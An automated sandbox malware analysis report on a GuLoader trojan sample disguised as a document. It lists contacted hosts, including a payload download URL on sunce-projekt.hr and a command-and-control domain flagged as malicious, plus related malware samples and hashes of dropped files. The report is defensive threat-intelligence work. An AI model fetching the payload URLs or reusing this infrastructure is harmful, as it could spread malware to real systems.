doc20250319-00712.bat.exe	31%	ReversingLabs	Win32.Trojan.Guloader

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Massen\Hypothetic\Coppersmiths\Flusher108\doc20250319-00712.bat.exe	31%	ReversingLabs	Win32.Trojan.Guloader

Source	Detection	Scanner	Label
https://www.sunce-projekt.hr/kdot.binXY	0%	Avira URL Cloud	safe
https://www.sunce-projekt.hr/	0%	Avira URL Cloud	safe
http://sslout.de	0%	Avira URL Cloud	safe
https://www.sunce-projekt.hr/kdot.bing	0%	Avira URL Cloud	safe
https://www.sunce-projekt.hr/kdot.binC	0%	Avira URL Cloud	safe
https://www.sunce-projekt.hr/kdot.binu	0%	Avira URL Cloud	safe
https://www.sunce-projekt.hr/kdot.bin	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
sunce-projekt.hr	178.63.45.97	true	false	unknown
ip-api.com	208.95.112.1	true	false	high
sslout.de	134.119.18.23	true	true	unknown
www.sunce-projekt.hr	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.sunce-projekt.hr/kdot.bin	false	Avira URL Cloud: safe	unknown
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.sunce-projekt.hr/kdot.binXY	msiexec.exe, 0000000C.00000002.2407825000.00000000063CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.1770805003.0000000005DFA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000003.00000002.1767732385.0000000004EE6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000003.00000002.1767732385.0000000004EE6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000003.00000002.1767732385.0000000004EE6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoft	powershell.exe, 00000003.00000002.1772793488.000000000732B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1772793488.000000000733D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.1860701770.0000000006400000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000003.00000002.1767732385.0000000004EE6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://certificates.godaddy.com/repository/0	msiexec.exe, 0000000C.00000002.2423694174.00000000242F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164151860.00000000242F3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164076973.00000000242ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2422375489.0000000022093000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2163949122.00000000242E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.sunce-projekt.hr/kdot.binC	msiexec.exe, 0000000C.00000003.1892497841.0000000006400000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://certs.godaddy.com/repository/1301	msiexec.exe, 0000000C.00000002.2423694174.00000000242F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164151860.00000000242F3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164076973.00000000242ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2422375489.0000000022093000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2163949122.00000000242E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000003.00000002.1770805003.0000000005DFA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.godaddy.com/gdig2s1-39361.crl0	msiexec.exe, 0000000C.00000002.2423694174.00000000242F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164151860.00000000242F3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164076973.00000000242ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2422375489.0000000022093000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2163949122.00000000242E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000003.00000002.1770805003.0000000005DFA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.sunce-projekt.hr/	msiexec.exe, 0000000C.00000003.1892497841.0000000006400000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2407825000.00000000063CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://sslout.de	msiexec.exe, 0000000C.00000002.2422375489.0000000022093000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	doc20250319-00712.bat.exe, doc20250319-00712.bat.exe.3.dr	false		high
https://certs.godaddy.com/repository/0	msiexec.exe, 0000000C.00000002.2423694174.00000000242F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164151860.00000000242F3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164076973.00000000242ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2422375489.0000000022093000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2163949122.00000000242E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000003.00000002.1767732385.0000000004EE6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.godaddy.com/gdroot-g2.crl0F	msiexec.exe, 0000000C.00000002.2423694174.00000000242F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164151860.00000000242F3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164076973.00000000242ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2422375489.0000000022093000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2163949122.00000000242E3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_Error	doc20250319-00712.bat.exe, doc20250319-00712.bat.exe.3.dr	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000003.00000002.1767732385.0000000004D91000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000003.00000002.1767732385.0000000004EE6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000003.00000002.1770805003.0000000005DFA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.1770805003.0000000005DFA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.sunce-projekt.hr/kdot.bing	msiexec.exe, 0000000C.00000003.1892497841.0000000006400000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ip-api.com	msiexec.exe, 0000000C.00000002.2422375489.0000000022031000.00000004.00000800.00020000.00000000.sdmp	false		high
http://certificates.godaddy.com/repository/gdig2.crt0	msiexec.exe, 0000000C.00000002.2423694174.00000000242F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164151860.00000000242F3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164076973.00000000242ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2422375489.0000000022093000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2163949122.00000000242E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.sunce-projekt.hr/kdot.binu	msiexec.exe, 0000000C.00000003.1892497841.0000000006400000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.1767732385.0000000004D91000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2422375489.0000000022031000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
178.63.45.97	sunce-projekt.hr	Germany	24940	HETZNER-ASDE	false
134.119.18.23	sslout.de	Germany	34011	GD-EMEA-DC-CGN1DE	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1643226
Start date and time:	2025-03-19 16:43:19 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	doc20250319-00712.bat.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/26@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 79 Number of non-executed functions: 46
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.60.203.209, 4.245.163.56
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
11:44:35	API Interceptor	37x Sleep call for process: powershell.exe modified
11:45:38	API Interceptor	43x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	IMG79287555883457729.jpg.exe	Get hash	malicious	GuLoader	Browse	ip-api.com/line/?fields=hosting
	IMG79287555883457729.jpg.exe	Get hash	malicious	GuLoader	Browse	ip-api.com/line/?fields=hosting
	MUKK.ps1	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	believe.ps1	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	VIK.ps1.vir.txt.ps1	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	devil.ps1.vir.txt.ps1	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	money.ps1.txt.ps1	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	roblox.exe.bin.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse	ip-api.com/json/?fields=225545
	rostestcheat.exe.bin.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse	ip-api.com/json/?fields=225545
	xfe79Gz.exe.bin.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse	ip-api.com/json/?fields=225545
134.119.18.23	doc20240625-00073.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	doc20240626-00073.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	doc20240624-00073.bat.exe	Get hash	malicious	AgentTesla	Browse
	documento_403698_06-06-2024.bat.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.PowerShell.Siggen.2046.5121.22247.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	doc023561361500.cmd.exe	Get hash	malicious	AgentTesla	Browse
	doc023561361500.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse
	nRUMdtAXUj.img	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse
	20240416-703661.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse
	disktop.pif.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	IMG79287555883457729.jpg.exe	Get hash	malicious	GuLoader	Browse	208.95.112.1
	IMG79287555883457729.jpg.exe	Get hash	malicious	GuLoader	Browse	208.95.112.1
	MUKK.ps1	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	believe.ps1	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	VIK.ps1.vir.txt.ps1	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	devil.ps1.vir.txt.ps1	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	money.ps1.txt.ps1	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	roblox.exe.bin.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse	208.95.112.1
	rostestcheat.exe.bin.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse	208.95.112.1
	xfe79Gz.exe.bin.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse	208.95.112.1
sslout.de	doc20240625-00073.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	134.119.18.23
	doc20240626-00073.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	134.119.18.23
	doc20240624-00073.bat.exe	Get hash	malicious	AgentTesla	Browse	134.119.18.23
	documento_403698_06-06-2024.bat.exe	Get hash	malicious	AgentTesla	Browse	134.119.18.23
	SecuriteInfo.com.PowerShell.Siggen.2046.5121.22247.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	134.119.18.23
	doc023561361500.cmd.exe	Get hash	malicious	AgentTesla	Browse	134.119.18.23
	doc023561361500.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	134.119.18.23
	nRUMdtAXUj.img	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	134.119.18.23
	20240416-703661.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse	134.119.18.23
	disktop.pif.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse	134.119.18.23

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HETZNER-ASDE	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	NWpNjnx.exe	Get hash	malicious	Vidar	Browse	78.47.63.132
	random(2).exe	Get hash	malicious	Vidar	Browse	78.47.63.132
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	Spacey Sun 11.12.411 (1).exe	Get hash	malicious	Vidar	Browse	94.130.189.58
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
TUT-ASUS	IMG79287555883457729.jpg.exe	Get hash	malicious	GuLoader	Browse	208.95.112.1
	IMG79287555883457729.jpg.exe	Get hash	malicious	GuLoader	Browse	208.95.112.1
	MUKK.ps1	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	believe.ps1	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	VIK.ps1.vir.txt.ps1	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	devil.ps1.vir.txt.ps1	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	money.ps1.txt.ps1	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	roblox.exe.bin.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse	208.95.112.1
	rostestcheat.exe.bin.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse	208.95.112.1
	xfe79Gz.exe.bin.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse	208.95.112.1
GD-EMEA-DC-CGN1DE	clearpicturewithmebestthingsforgivenmebest.hta	Get hash	malicious	Cobalt Strike, FormBook	Browse	92.204.40.98
	verynicepeoplesgivenbestthingswithgreatness.hta	Get hash	malicious	Cobalt Strike, FormBook	Browse	92.204.40.98
	Urgent Purchase Order.vbe	Get hash	malicious	FormBook	Browse	92.204.40.98
	Quotation.exe	Get hash	malicious	FormBook	Browse	92.204.40.98
	Quotation.exe	Get hash	malicious	FormBook	Browse	92.204.40.98
	Quotation.exe	Get hash	malicious	FormBook	Browse	92.204.40.98
	niceworkingskillwthichbetterperformancefromme.hta	Get hash	malicious	Cobalt Strike, FormBook	Browse	92.204.40.98
	Shipping Document.exe	Get hash	malicious	FormBook	Browse	92.204.40.98
	YzvM4Dzoe3.exe	Get hash	malicious	FormBook	Browse	92.204.40.98
	s8wz2CMKYZ.exe	Get hash	malicious	SystemBC	Browse	92.204.37.174

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	IMG79287555883457729.jpg.exe	Get hash	malicious	GuLoader	Browse	178.63.45.97
	IMG79287555883457729.jpg.exe	Get hash	malicious	GuLoader	Browse	178.63.45.97
	NWpNjnx.exe	Get hash	malicious	Vidar	Browse	178.63.45.97
	random(2).exe	Get hash	malicious	Vidar	Browse	178.63.45.97
	Spacey Sun 11.12.411 (1).exe	Get hash	malicious	Vidar	Browse	178.63.45.97
	a.cmd	Get hash	malicious	GuLoader, Remcos	Browse	178.63.45.97
	01903025ZW-BP001.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.63.45.97
	Invio Ordine accompagnatorio n. 20250319-70611 del 03192025 - C.E.F. Srl.js	Get hash	malicious	AgentTesla	Browse	178.63.45.97
	BSKDh.98374.10.exe	Get hash	malicious	Unknown	Browse	178.63.45.97
	BSKDh.98374.10.exe	Get hash	malicious	Unknown	Browse	178.63.45.97

Process:	C:\Users\user\Desktop\doc20250319-00712.bat.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Category:	dropped
Size (bytes):	942
Entropy (8bit):	3.3091656043968483
Encrypted:	false
SSDEEP:	12:8wl0FsXyllEzK2IBrui1zK9IpcK9j57Q1+2meHxuUEAsbNbQgQ4t2YZ/elFlSJm:8G2CzKrrDs9OJ9j6IeHxsJJoqy
MD5:	B46C4999600721B1A392C105597FD132
SHA1:	B74D74002B1B0686599B598F1CD345011755AA71
SHA-256:	F7D187B129BC870BC52D535C646B5CD1ED47BA0DD274453AA0894E6FAAD55C39
SHA-512:	0BC6671D22BEEEC7A5CB9C780A846D68706BF64F548002FDEF5B201550346E65AB74F0E7AFC025F909BCCD96B5A7AC78E18B491997C5BF655EA8E0CF48E1308E
Malicious:	false
Reputation:	low
Preview:	L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................b.r.o.k.....T.1...........Videos..>............................................V.i.d.e.o.s.....n.2...........Colporteurs.far.P............................................C.o.l.p.o.r.t.e.u.r.s...f.a.r.......$.....\.U.s.e.r.s.\.b.r.o.k.\.V.i.d.e.o.s.\.C.o.l.p.o.r.t.e.u.r.s...f.a.r.^.C.:.\.U.s.e.r.s.\.b.r.o.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.R.e.g.u.a.r.d.a.n.t.3.0.\.t.a.o.i.s.t.\.M.a.s.s.e.n.\.H.y.p.o.t.h.e.t.i.c.\.C.o.p.p.e.r.s.m.i.t.h.s.\.F.l.u.s.h.e.r.1.0.8...............................[E...\|t...................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Afhndernes.jpg

Download File

Process:	C:\Users\user\Desktop\doc20250319-00712.bat.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x342, components 3
Category:	dropped
Size (bytes):	44270
Entropy (8bit):	7.965346124339569
Encrypted:	false
SSDEEP:	768:wm+zz5Flnd96yUVyyFskxLkAEHK/jHes6I3jgFsWqe5klgQz++i7x/jp10SeXlE6:wXh7L6f7skxLD7JzgCQ5UgQzVixdKbXp
MD5:	ADB224FF686271068EA73A555F4591CA
SHA1:	54699FA1BB06F2A66680DEBC2FFBD90D6DEED6E4
SHA-256:	1407C1F26DE72E61DEF4B8D81B80240AE0211AAD3B98755FFECFBF99D4234D1C
SHA-512:	D03427484B69805B4A76D4A5F65356767567A3FD916F16D4445E8C54E7A3A598652FCFC04629DFEA480D2B9FB7B2EEBC1CA77C36D8CA430F197D4EF927F35195
Malicious:	false
Reputation:	low
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......V...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..a..*.6{...8..+cH../..+..Fv.r.9.r...K.c.eKa..N....L...Q].~.......i..3z}k..a....v..+.4......L.....<..Z_............@q...'V.'T .>E..VKV...^.&..).c\..'../......L....v>......g5...$,...P.H...w.Et.....,.\.I.....1..Y.f.p.....I...q.2.).rEX.).CV..{b.l.......L...L.g'.iEs.sP0...E....#Z.DV7.c.=....~.H.d.812.C....... .)N1..S5f:s.WG1k.....z.Y.k.......H4.v...[B2S..<U.t.U..~

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Fisketure\Engagements.txt

Download File

Process:	C:\Users\user\Desktop\doc20250319-00712.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	517
Entropy (8bit):	4.773649537573718
Encrypted:	false
SSDEEP:	12:ctbl/L/xfLiBKSamq5N3YDpPdyraJHifJYwY3xET:exhSamA3YVPcruHkD
MD5:	6699B3214F48E4EAE5E5365B62D99FBD
SHA1:	D4B92617E52E26C8ED8ADD5AA7C7033A6547BBFF
SHA-256:	67F3F56FB3FA00CAA8FDDCA739D18886523A07C5A7CE0420978A86F11B6269E4
SHA-512:	DA60E11BB40527C24F9441D3DB44CBC57E879F51B685EE563469253D6C0CC6D5284C00AF9FA4CEF39382CFF7FC5C3D07F23C10099A13D890CC3700C075E65667
Malicious:	false
Reputation:	low
Preview:	Paraphrenic preunited hviskenes pavois,festligste vegetarers flusmiddelets rackan misfortolkende afboeje..;sovietise quills othertimes undyingly antennen noumenal.Snorene tranquil uru..familieplanlgningernes konsulenter oplsningsaftenen urskovene.Pingster jacobean kelk mauritss circumambiency encrusting deformities..[NATIONALFORSAMLINGERNES BROWNIER]..sammenvoksningers netman forureningssagens beskrivelsesrammers relationsalgebraers.Damosel antichristianism hobroer tiggende teys..[SKORSTENENES EKSPEDIENTERNES]..

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Fisketure\Regulatorens.uzb

Download File

Process:	C:\Users\user\Desktop\doc20250319-00712.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	8527168
Entropy (8bit):	0.15879860755098762
Encrypted:	false
SSDEEP:	768:ltGndondZwh7Ook+WMYMw8NFtSYOFIBaA1IeYyZS9+fFuhmn3mt6JUkvqH5am3Gj:/ncCs9/XP
MD5:	69DAFE9BC8CAD4B502FAD22D5D094035
SHA1:	789B8B11EC30BD989EA894D765F5905007BF4595
SHA-256:	A15167DE979CB692D12B805A98D435821AF5A73B76C00516E71F1829EC118D9A
SHA-512:	E51AD7233B0DBB99D030518DA344E2D1714DB5D1434ADCD77D5F2BA946678E41701604DB7FEC96266FDBAF9EBE5F65905520382895ED13975D4013C56FA1BC8F
Malicious:	false
Reputation:	low
Preview:	FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFBFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF_FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF.FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF.FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF.FFFFFFFFFFFFFFFFFFFFFFFFFFFFFiFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF+FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF.FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF.FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF.FFFFFFFFFFFFFFFFFFFQFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF.FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFHFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Fisketure\barbuts.jpg

Download File

Process:	C:\Users\user\Desktop\doc20250319-00712.bat.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 269x719, components 3
Category:	dropped
Size (bytes):	33633
Entropy (8bit):	7.947205589300858
Encrypted:	false
SSDEEP:	768:dOK1XgJFCsXcZfmQQRgTT5Ft/dQD4VQhk+zutxs6pT5K62Bb:dFgCDZfmQQRgvjtqDYBtKQ8
MD5:	CC8278852622783E043552F230E7A837
SHA1:	24FD8420DC30EFD35444A57BDD36841ADA1D7C16
SHA-256:	2FD33C27F981B723CC01DC877DC89FFF966F942EDC5F28194672B571F3792356
SHA-512:	6600A499A790B4FF9C5B7E160C38C59D679C31FF863A3032905CB7105F47EFFA54FC1A667FE81F4122D65264683F0CE2B0904C00404CAB6A9FBE9FD633FD2A82
Malicious:	false
